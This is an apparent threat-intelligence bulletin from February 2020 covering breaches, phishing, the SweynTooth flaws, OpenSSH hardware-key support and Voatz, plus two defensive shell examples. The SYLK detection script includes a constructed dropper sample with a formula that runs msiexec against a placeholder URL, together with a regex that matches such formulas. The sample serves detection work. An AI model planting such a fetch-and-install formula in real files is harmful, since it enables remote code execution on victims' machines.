CloudSEK Daily Threat Bulletin – 17th February 2020

Round Up of Major Breaches and Scams

Twitter accounts of the Olympics, IOC, and FC Barcelona hacked

The Olympics’, International Olympic Committee’s (IOC) and Spanish football club FC Barcelona’s Twitter accounts have joined the growing list of hijacked accounts. Twitter said the accounts were compromised through a third-party platform, and has temporarily locked them while it investigates.

200+ phishing pages target customers of major banks

Threat actors have created more than 200 phishing pages impersonating major banks, most of them Canadian, including Scotiabank, CIBC, RBC, UNI, HSBC, Tangerine, TD, Meridian, Laurentian, Manulife, BNC, and Chase, in order to steal banking credentials. The pages are laid out and sized for mobile screens, and victims are lured to them with automated messages sent through an SMS tool. The thousands of unique IPs that accessed the links show that the victims are spread across the world.

Coronavirus scams continue to spread misinformation in South Korea

The South Korean government has warned of a growing smishing campaign: fraudulent text messages spreading misinformation about the novel coronavirus outbreak. So far, 9,688 texts and 165 calls have been reported. The texts offer free masks, while the calls use spoofed numbers and impersonate health authorities to extract money and personal information. The government will work with telcos to block the numbers used in the scams.

7,992 breaches across 10 Canadian entities compromise data of 144,000 people

Over the last two years, 7,992 breaches across 10 Canadian government entities compromised the personal information of 144,000 individuals. The breaches are attributed to misdirected mail, security incidents, and employee misconduct. The Canada Revenue Agency was the worst affected, with 3,020 breaches involving the details of 59,065 individuals.

UK’s Redcar Council goes offline after cyber-attack

Redcar and Cleveland Borough Council’s systems were attacked on Saturday. Since then, its 135,000 residents have been without online public services, including appointment bookings, planning documents, and social care advice. The incident appears to be a ransomware attack, but the council has not confirmed this. Initial assessments indicate that no confidential data was stolen.

PhotoSquared app exposes personal data of 100,000 users

Popular photo app PhotoSquared exposed the personal data of its 100,000 users through an unsecured, publicly accessible AWS S3 bucket. The 94.7GB of leaked data included full names, home addresses, photos, shipping labels, and order records.

IOTA cryptocurrency hack results in severe losses for users

IOTA halted its network after attackers exploited a vulnerability in Trinity, its mobile and desktop wallet app, to steal user funds. Within 25 minutes of identifying the theft, IOTA shut down the “Coordinator,” the node that gives final approval to every transaction. IOTA has confirmed that the attackers mainly targeted 10 high-value accounts. The amount stolen has not been confirmed, but open-source reports put it at as much as $1.6 million worth of IOTA. Since the attack came to light on 12th February 2020, IOTA’s price has fallen from $0.35 to $0.29 per coin.

Breach in partner’s network exposes 1.7 million Nedbank customers’ details

Nedbank, one of South Africa’s biggest banks, announced that a vulnerability in a partner’s network gave attackers access to the personal details of 1.7 million past and current customers. The partner, which runs the bank’s marketing and promotional campaigns, held a copy of customer details including names, ID numbers, addresses, phone numbers, and email addresses. The breach was discovered during routine monitoring of the partner’s network.

French plastic surgery tech firm NextMotion exposes patient details

An improperly secured S3 bucket used by French plastic surgery tech firm NextMotion to store patient data was exposed. The company, which provides imaging and patient management services, kept around 900,000 sensitive images, videos, and treatment records in the bucket. The company denies that the data contained Personally Identifiable Information (PII), but researchers believe otherwise. The bucket has since been secured; a leak of this magnitude could still be used to orchestrate scams and targeted attacks against the patients.

Round Up of Major Malware and Ransomware Incidents

Attackers use phishing emails to launch malware attacks on 13 major companies

Threat actors have launched phishing attacks against 13 companies, including Glad and Hasbro, in an attempt to gain access to their corporate networks. The emails pretend to come from a vendor or client of the company and carry SLK (SYLK, Symbolic Link) attachments, a plain-text spreadsheet format that Excel opens and that can hold formulas. When the recipient opens the file and clicks ‘Enable Content,’ the formulas inside run, fetch an MSI installer from a remote site, and install the NetSupport Manager RAT. That foothold lets the attackers move through the network to deploy ransomware, steal data, and run BEC scams.
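As an added example that is not part of the bulletin or of any vendor report, the following POSIX shell function is a gateway-side triage check for SYLK attachments. It looks for the markers the technique above relies on: the macro-sheet declaration, an Auto_Open name, and cell formulas that spawn a process or reference msiexec or a URL. The two sample files are constructed for the demo; the URL in them is a placeholder.

```shell
# slk_suspicious FILE: exit 0 if FILE shows the markers of a SYLK (.slk)
# macro dropper, 1 otherwise. Matching records are printed to stderr.
# SYLK is plain text, one record per line, fields separated by ';'. Markers:
#   O;E                    sheet is declared an Excel 4.0 macro sheet
#   NN;NAuto_Open          a name that makes Excel run a cell on open
#   C;...;E<formula>       a cell formula calling EXEC/CALL/REGISTER, or
#                          naming msiexec or a URL (the remote-MSI stage)
# This is a triage heuristic for a mail gateway or SOC script, not a parser;
# a missing file is treated as "nothing found".
slk_suspicious() {
  hits=$(grep -inE \
    '^(O;E$|NN;NAuto_(Open|Close);|C;([XY][0-9]+;)*E[^;]*(EXEC|CALL|REGISTER|msiexec|https?:))' \
    "$1" 2>/dev/null || true)
  [ -n "$hits" ] || return 1
  printf 'suspicious SYLK records in %s:\n%s\n' "$1" "$hits" >&2
  return 0
}

# Constructed samples (not captured attachments) so the check runs offline.
tmp=$(mktemp -d)
cat >"$tmp/invoice.slk" <<'EOF'
ID;PWXL;N;E
O;E
NN;NAuto_Open;ER1C1
C;X1;Y1;EEXEC("msiexec /i https://example.invalid/update.msi /q")
C;X1;Y2;EHALT()
E
EOF
cat >"$tmp/budget.slk" <<'EOF'
ID;PWXL;N;E
C;X1;Y1;K"Q1 budget"
C;X2;Y1;K1200
C;X2;Y2;ESUM(R1C2:R1C2)
E
EOF

slk_suspicious "$tmp/invoice.slk" && echo "invoice.slk: QUARANTINE"
slk_suspicious "$tmp/budget.slk" || echo "budget.slk: clean"
```

The regex anchors on record prefixes rather than grepping the whole file for "EXEC", so a harmless string cell that merely contains the word does not trip it; a lowercase or mixed-case formula is still caught because matching is case-insensitive.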

Hamas militants trick Israeli soldiers into installing malware

In what appears to be the work of APT-C-23, Hamas operatives posing as teenage girls persuaded Israeli soldiers to install malware-laced apps on their phones. They first created fake social media profiles and struck up conversations with the soldiers, then, promising more photos, lured them into installing chat apps named Catch & See, Grixy, and Zatu. After installation the app appears to crash and remove itself while continuing to run in the background, stealing photos, messages, contacts, and geolocation and installing further malware. The malware has been removed and the Hamas infrastructure hosting it has been taken down.

Round Up of Major Vulnerabilities and Patches

Microsoft recalls security update that affects Windows 10 PCs

Security update KB4524244, released as part of Microsoft’s February Patch Tuesday, has been pulled after users reported problems on some Windows 10 PCs. The update addressed a security vulnerability in third-party Unified Extensible Firmware Interface (UEFI) boot managers. A related update, KB4502496, which addressed the same issue on other versions of Windows, has also been withdrawn. Microsoft recommends that users experiencing issues uninstall the update while it works on an improved version to be released later.

SweynTooth bugs have major impact on devices using Bluetooth LE protocol

Twelve vulnerabilities, collectively named SweynTooth, have been reported in system-on-a-chip (SoC) implementations of the Bluetooth Low Energy (BLE) protocol. Seven affected SoC vendors have been identified (Texas Instruments, NXP, Cypress, Dialog Semiconductor, Microchip, STMicroelectronics, and Telink Semiconductor), and more are believed to be affected. Over 480 end-user products are impacted, including devices from Fitbit, Samsung, and Xiaomi. The flaws cannot be exploited over the internet and require an attacker within Bluetooth radio range, but they can be used to crash devices, deadlock them so they stop responding, and, on some chips, bypass security to take control of the device.

OpenSSH 8.2 adds support for FIDO/U2F hardware security keys

OpenSSH 8.2 adds support for FIDO/U2F hardware authenticators as a new class of SSH key (ecdsa-sk and ed25519-sk). The private key never leaves the token and each signature requires the user to touch it, so a copied key file is useless on its own. The security key can be a USB, Bluetooth, or NFC device, and a server can combine it with a password through AuthenticationMethods so that a login needs both a secret the user knows and a device the user holds. The aim is to block attempts to take over servers with stolen credentials.
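As an added example that is not part of the bulletin or of the OpenSSH project, the block below shows the client-side enrolment commands and two small POSIX shell checks an administrator can run offline to confirm that a server actually insists on the hardware key. Key generation needs a physical token, so it is shown as a comment; the sshd_config and authorized_keys samples are constructed and the key blobs in them are placeholders, not real keys.

```shell
# Enrolment (needs a FIDO token; shown as comments because it cannot run offline):
#   ssh-keygen -t ecdsa-sk -f ~/.ssh/id_ecdsa_sk      # touch the token when prompted
#   ssh-copy-id -i ~/.ssh/id_ecdsa_sk.pub user@server  # installs the public half
# ~/.ssh/id_ecdsa_sk holds only a key handle; signing happens on the token.

# sshd_requires_pubkey FILE: 0 if FILE (an sshd_config) has an
# AuthenticationMethods line in which every alternative includes publickey,
# so no set of credentials can log in without a key. sshd honours the first
# occurrence of a keyword, so the first line wins; Match blocks are not parsed.
sshd_requires_pubkey() {
  line=$(grep -iE '^[[:space:]]*AuthenticationMethods[[:space:]]' "$1" | head -n 1)
  [ -n "$line" ] || return 1
  set -- $line            # $1 = keyword, the rest = space-separated alternatives
  shift
  [ $# -gt 0 ] || return 1
  for alt in "$@"; do
    case ",$alt," in
      *,publickey,*) ;;     # this alternative demands a key
      *) return 1 ;;        # e.g. "password" on its own, or "any"
    esac
  done
  return 0
}

# authorized_keys_sk_only FILE: 0 if every key line is a FIDO key type and
# none carries no-touch-required, an option that waives the touch and turns
# the token back into a plain stored key.
authorized_keys_sk_only() {
  while IFS= read -r line || [ -n "$line" ]; do
    case "$line" in ''|'#'*) continue ;; esac
    case "$line" in *no-touch-required*) return 1 ;; esac
    case "$line" in
      *sk-ecdsa-sha2-nistp256@openssh.com*|*sk-ssh-ed25519@openssh.com*) ;;
      *) return 1 ;;
    esac
  done <"$1"
  return 0
}

# Constructed samples (not real configs or keys) so the checks run offline.
tmp=$(mktemp -d)
cat >"$tmp/sshd_config.weak" <<'EOF'
# a password alone is still an accepted alternative
AuthenticationMethods publickey password
EOF
cat >"$tmp/sshd_config.good" <<'EOF'
AuthenticationMethods publickey,password publickey,keyboard-interactive
EOF
cat >"$tmp/authorized_keys.good" <<'EOF'
sk-ecdsa-sha2-nistp256@openssh.com AAAAplaceholder user@laptop
EOF
cat >"$tmp/authorized_keys.weak" <<'EOF'
no-touch-required sk-ecdsa-sha2-nistp256@openssh.com AAAAplaceholder user@laptop
ssh-rsa AAAAplaceholder old-laptop
EOF

sshd_requires_pubkey "$tmp/sshd_config.good" && echo "sshd_config.good: key always required"
sshd_requires_pubkey "$tmp/sshd_config.weak" || echo "sshd_config.weak: password-only login possible"
authorized_keys_sk_only "$tmp/authorized_keys.good" && echo "authorized_keys.good: FIDO keys only"
authorized_keys_sk_only "$tmp/authorized_keys.weak" || echo "authorized_keys.weak: touch waived or non-FIDO key present"
```

The point of the second check is that a hardware key only protects a server if it is the only kind of key that server accepts: one leftover ssh-rsa line, or one no-touch-required option, gives an attacker with a copied file exactly the access the token was meant to remove.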

MIT finds vulnerabilities in mobile voting app Voatz

MIT researchers have identified several security vulnerabilities in the mobile voting app Voatz. The app was used in West Virginia during the 2018 midterm elections and was slated for use in the 2020 elections as well. The flaws could allow attackers to alter, block, or expose a user’s vote, and a side channel could let an attacker recover a user’s secret ballot.


